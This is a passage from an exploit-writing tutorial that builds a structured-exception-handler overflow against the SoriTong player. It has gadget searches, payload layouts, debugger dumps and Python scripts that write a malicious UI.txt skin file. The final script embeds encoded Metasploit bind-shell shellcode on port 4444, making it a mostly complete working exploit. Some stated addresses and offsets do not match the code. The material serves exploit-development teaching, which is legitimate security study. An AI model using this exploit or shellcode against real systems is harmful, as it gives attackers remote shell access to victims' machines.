77DD0000   0009B000   77DD70FB ADVAPI32.<ModuleE  ADVAPI32 (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\ADVAPI32.dll
77E70000   00092000   77E7628F RPCRT4.<ModuleEnt  RPCRT4   (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\RPCRT4.dll
77F10000   00049000   77F16587 GDI32.<ModuleEntr  GDI32    (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\GDI32.dll
77F60000   00076000   77F651FB SHLWAPI.<ModuleEn  SHLWAPI  (system  6.00.2900.5512 (xpsp.0804  C:\WINDOWS\system32\SHLWAPI.dll
77FE0000   00011000   77FE2126 Secur32.<ModuleEn  Secur32  (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\Secur32.dll
7C800000   000F6000   7C80B63E kernel32.<ModuleE  kernel32 (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\kernel32.dll
7C900000   000AF000   7C912C28 ntdll.<ModuleEntr  ntdll    (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\ntdll.dll
7C9C0000   00817000   7C9E74D6 SHELL32.<ModuleEn  SHELL32  (system  6.00.2900.5512 (xpsp.0804  C:\WINDOWS\system32\SHELL32.dll
7E410000   00091000   7E41B217 USER32.UserClient  USER32   (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\USER32.dll

We are specifially interested in application specific dll’s, so let’s find a pop pop ret in that dll. Using findjmp.exe, we can look into that dll and look for pop pop ret sequences (e.g. look for pop edi)
Any of the following addresses should do, as long as it does not contain null bytes.

$ ./findjmp.exe Player.dll edi | grep pop | grep -v "000"
0x100104F8      pop edi - pop - retbis
0x100106FB      pop edi - pop - ret
0x1001074F      pop edi - pop - retbis
0x10010CAB      pop edi - pop - ret
0x100116FD      pop edi - pop - ret
0x1001263D      pop edi - pop - ret
0x100127F8      pop edi - pop - ret
0x1001281F      pop edi - pop - ret
0x10012984      pop edi - pop - ret
0x10012DDD      pop edi - pop - ret
0x10012E17      pop edi - pop - ret
0x10012E5E      pop edi - pop - ret
0x10012E70      pop edi - pop - ret
0x10012F56      pop edi - pop - ret
0x100133B2      pop edi - pop - ret
0x10013878      pop edi - pop - ret
0x100138F7      pop edi - pop - ret
0x10014448      pop edi - pop - ret
0x10014475      pop edi - pop - ret
0x10014499      pop edi - pop - ret
0x100144BF      pop edi - pop - ret
0x10016D8C      pop edi - pop - ret
0x100173BB      pop edi - pop - ret
0x100173C2      pop edi - pop - ret
0x100173C9      pop edi - pop - ret
0x1001824C      pop edi - pop - ret
0x10018290      pop edi - pop - ret
0x1001829B      pop edi - pop - ret
0x10018DE8      pop edi - pop - ret
0x10018FE7      pop edi - pop - ret
0x10019267      pop edi - pop - ret
0x100192EE      pop edi - pop - ret
0x1001930F      pop edi - pop - ret
0x100193BD      pop edi - pop - ret
0x100193C8      pop edi - pop - ret
0x100193FF      pop edi - pop - ret
0x1001941F      pop edi - pop - ret
0x1001947D      pop edi - pop - ret
0x100194CD      pop edi - pop - ret
0x100194D2      pop edi - pop - ret
0x1001B7E9      pop edi - pop - ret
0x1001B883      pop edi - pop - ret
0x1001BDBA      pop edi - pop - ret
0x1001BDDC      pop edi - pop - ret
0x1001BE3C      pop edi - pop - ret
0x1001D86D      pop edi - pop - ret
0x1001D8F5      pop edi - pop - ret
0x1001E0C7      pop edi - pop - ret
0x1001E812      pop edi - pop - ret

Let’s say we will use 0x1008DE8, which corresponds with

10018DE8  |.  5F            POP EDI
10018DE9  |.  5E            POP ESI
10018DEA  |.  C3            RETN

(You should be able to use any of the addresses).

Note : as you can see above, findjmp requires you to specify a register. It may be easier to use msfpescan from Metasploit (simply run msfpescan against the dll, with parameter -p (look for pop pop ret) and output everything to file. msfpescan does not require you to specify a register, it will simply get all combinations… Then open the file & you’ll see all address. Alternatively you can use memdump to dump all process memory to a folder, and then use msfpescan -M -p to look for all pop pop ret combinations from memory.

lab:metasploit-framework/ $ ./msfpescan -p ~/share/Player.dll

The exploit payload must look like this:

[584 characters][0xeb,0x06,0x90,0x90][0x10018de8][NOPs][Shellcode]
junk             next SEH             current SEH

In fact, most typical SEH exploits will look like this :

 ----------------------------------------------------------------------------------------
 | Buffer padding  |  short jump to stage 2 | pop/pop/ret address | stage 2 (shellcode) |
 ----------------------------------------------------------------------------------------
 | Buffer          |  next SEH              | SEH                 |                     |
 ----------------------------------------------------------------------------------------

In order to locate the shellcode (which should be right after SEH), you can replace the 4 bytes at “next SEH” with breakpoints. That will allow you to inspect the registers. An example :

#!/usr/bin/env python
# -*- coding: utf8 -*-

from struct import pack

junk1 = "A" * 504
next_seh = "\xcc\xcc\xcc\xcc"
se_handler = pack("I", 0x1001E812)
shellcode = "B" * 50
junk2 = "\x90" * 200

payload = junk1 + next_seh + se_handler + shellcode + junk2

f = open("C:\Program Files\SoriTong\Skin\Default\UI.txt", 'w')
f.write(payload)
f.close()

(9cc.8fc): Break instruction exception - code 80000003 (first chance)
eax=00241eb4 ebx=7ffdf000 ecx=00000001 edx=00000002 esi=00241f48 edi=00241eb4
eip=7c90120e esp=0012fb20 ebp=0012fc94 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3

So, after passing on the first exception to the application, the application has stopped because of the breakpoints at nSEH.

(1dc.a00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130000 ebx=00000003 ecx=ffffff90 edx=00000090 esi=0017d504 edi=0012fd64
eip=00422e33 esp=0012da14 ebp=0012fd38 iopl=0         nv up ei ng nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010296
*** WARNING: Unable to verify checksum for SoriTong.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for SoriTong.exe -
SoriTong!TmC13_5+0x3ea3:
00422e33 8810            mov     byte ptr [eax],dl          ds:0023:00130000=41

EIP currently points at the first byte at nSEH, so you should be able to see the shellcode about 8 bytes (4 bytes for nSEH, and 4 bytes for SEH) further down :

(1dc.a00): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=1001e812 edx=7c9032bc esi=0012d72c edi=7c9032a8
eip=0012fd64 esp=0012d650 ebp=0012d664 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
0012fd64 cc              int     3
0:000> d eip
0012fd64  cc cc cc cc 12 e8 01 10-31 41 42 43 44 45 46 47  ........1ABCDEFG
0012fd74  48 49 4a 4b 4c 4d 32 41-42 43 44 45 46 47 48 49  HIJKLM2ABCDEFGHI
0012fd84  4a 4b 4c 4d 33 41 42 43-44 45 46 47 48 49 4a 4b  JKLM3ABCDEFGHIJK
0012fd94  4c 4d 90 90 90 90 90 90-90 90 90 90 90 90 90 90  LM..............
0012fda4  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0012fdb4  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0012fdc4  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0012fdd4  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................

Perfect, the shellcode is visible and starts exactly where we had expected. I have used a short string to test the shellcode, it may be a good idea to use a longer string (just to verify that there are no “holes” in the shellcode anywhere). If the shellcode starts at an offset of where it should start, then you’ll need to modify the jumpcode (at nSEH) so it would jump further.

msf payload(shell_bind_tcp) > show options

Module options (payload/windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     127.0.0.1        no        The target address

msf payload(shell_bind_tcp) > generate -b '\x00\x0b\x0d\x0a' -t py

Now we are ready to build the exploit with real shellcode (and replace the breakpoints at nSEH again with the jumpcode).

#!/usr/bin/env python
# -*- coding: utf8 -*-

from struct import pack

junk1 = "A" * 584
next_seh = "\xeb\x06\x90\x90"
se_handler = pack("L", 0x1001E812)

# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=127.0.0.1,
# PrependMigrate=false, EXITFUNC=seh, InitialAutoRunScript=,
# AutoRunScript=
buf =  ""
buf += "\xb8\xa1\x67\xbb\xcb\xd9\xe9\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x53\x31\x46\x12\x83\xee\xfc\x03\xe7\x69\x59"
buf += "\x3e\x1b\x9d\x1f\xc1\xe3\x5e\x40\x4b\x06\x6f\x40\x2f"
buf += "\x43\xc0\x70\x3b\x01\xed\xfb\x69\xb1\x66\x89\xa5\xb6"
buf += "\xcf\x24\x90\xf9\xd0\x15\xe0\x98\x52\x64\x35\x7a\x6a"
buf += "\xa7\x48\x7b\xab\xda\xa1\x29\x64\x90\x14\xdd\x01\xec"
buf += "\xa4\x56\x59\xe0\xac\x8b\x2a\x03\x9c\x1a\x20\x5a\x3e"
buf += "\x9d\xe5\xd6\x77\x85\xea\xd3\xce\x3e\xd8\xa8\xd0\x96"
buf += "\x10\x50\x7e\xd7\x9c\xa3\x7e\x10\x1a\x5c\xf5\x68\x58"
buf += "\xe1\x0e\xaf\x22\x3d\x9a\x2b\x84\xb6\x3c\x97\x34\x1a"
buf += "\xda\x5c\x3a\xd7\xa8\x3a\x5f\xe6\x7d\x31\x5b\x63\x80"
buf += "\x95\xed\x37\xa7\x31\xb5\xec\xc6\x60\x13\x42\xf6\x72"
buf += "\xfc\x3b\x52\xf9\x11\x2f\xef\xa0\x7d\x9c\xc2\x5a\x7e"
buf += "\x8a\x55\x29\x4c\x15\xce\xa5\xfc\xde\xc8\x32\x02\xf5"
buf += "\xad\xac\xfd\xf6\xcd\xe5\x39\xa2\x9d\x9d\xe8\xcb\x75"
buf += "\x5d\x14\x1e\xe3\x55\xb3\xf1\x16\x98\x03\xa2\x96\x32"
buf += "\xec\xa8\x18\x6d\x0c\xd3\xf2\x06\xa5\x2e\xfd\x39\x6a"
buf += "\xa6\x1b\x53\x82\xee\xb4\xcb\x60\xd5\x0c\x6c\x9a\x3f"
buf += "\x25\x1a\xd3\x29\xf2\x25\xe4\x7f\x54\xb1\x6f\x6c\x60"
buf += "\xa0\x6f\xb9\xc0\xb5\xf8\x37\x81\xf4\x99\x48\x88\x6e"
buf += "\x39\xda\x57\x6e\x34\xc7\xcf\x39\x11\x39\x06\xaf\x8f"
buf += "\x60\xb0\xcd\x4d\xf4\xfb\x55\x8a\xc5\x02\x54\x5f\x71"
buf += "\x21\x46\x99\x7a\x6d\x32\x75\x2d\x3b\xec\x33\x87\x8d"
buf += "\x46\xea\x74\x44\x0e\x6b\xb7\x57\x48\x74\x92\x21\xb4"
buf += "\xc5\x4b\x74\xcb\xea\x1b\x70\xb4\x16\xbc\x7f\x6f\x93"
buf += "\xc2\x8e\xbd\x0e\x52\x29\x54\x73\x3e\xca\x83\xb0\x47"
buf += "\x49\x21\x49\xbc\x51\x40\x4c\xf8\xd5\xb9\x3c\x91\xb3"
buf += "\xbd\x93\x92\x91"
junk2 = "\x90" * 1000

payload = junk1 + next_seh + se_handler + buf + junk2

f = open("C:\Program Files\SoriTong\Skin\Default\UI.txt", 'w')
f.write(payload)
f.close()

Create the ui.txt file and open soritong.exe directly (not from the debugger this time), and a shell listener is background.

0:000> g
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 10000000 10094000   C:\Program Files\SoriTong\Player.dll
ModLoad: 42100000 42129000   C:\WINDOWS\system32\wmaudsdk.dll
ModLoad: 00eb0000 00eff000   C:\WINDOWS\system32\DRMClien.DLL
ModLoad: 5bc60000 5bc9f000   C:\WINDOWS\system32\strmdll.dll
ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.dll
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
(e58.e20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130000 ebx=00000003 ecx=ffffff90 edx=00000090 esi=0017d504 edi=0012fd64
eip=00422e33 esp=0012da14 ebp=0012fd38 iopl=0         nv up ei ng nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010296
*** WARNING: Unable to verify checksum for SoriTong.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for SoriTong.exe -
SoriTong!TmC13_5+0x3ea3:
00422e33 8810            mov     byte ptr [eax],dl          ds:0023:00130000=41
0:000> !exchain
0012fd64: *** WARNING: Unable to verify checksum for C:\Program Files\SoriTong\Player.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\SoriTong\Player.dll -
Player!Player_Action+ef52 (1001e812)
Invalid exception stack at 909006eb
0:000> d 0012fd60
0012fd60  41 41 41 41 eb 06 90 90-12 e8 01 10 b8 a1 67 bb  AAAA..........g.
0012fd70  cb d9 e9 d9 74 24 f4 5e-31 c9 b1 53 31 46 12 83  ....t$.^1..S1F..
0012fd80  ee fc 03 e7 69 59 3e 1b-9d 1f c1 e3 5e 40 4b 06  ....iY>.....^@K.
0012fd90  6f 40 2f 43 c0 70 3b 01-ed fb 69 b1 66 89 a5 b6  o@/C.p;...i.f...
0012fda0  cf 24 90 f9 d0 15 e0 98-52 64 35 7a 6a a7 48 7b  .$......Rd5zj.H{
0012fdb0  ab da a1 29 64 90 14 dd-01 ec a4 56 59 e0 ac 8b  ...)d......VY...
0012fdc0  2a 03 9c 1a 20 5a 3e 9d-e5 d6 77 85 ea d3 ce 3e  *... Z>...w....>
0012fdd0  d8 a8 d0 96 10 50 7e d7-9c a3 7e 10 1a 5c f5 68  .....P~...~..\.h

41 41 41 41 : last characters of buffer
eb 06 90 90 : next SEH, do a 6byte jump
12 e8 01 10 : current SE Handler (pop pop ret, which will trigger the next exception, making the code go to the next SEH pointer and run “eb 06 90 90”)
b8 a1 67 bb: begin of shellcode (I added a \xcc which is the breakpoint), at address 0x0012fd6c.

References

https://www.exploit-db.com/docs/17505.pdf
http://www.fuzzysecurity.com/tutorials/expDev/3.html
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
http://www.youtube.com/watch?v=FYmfYOOrQ00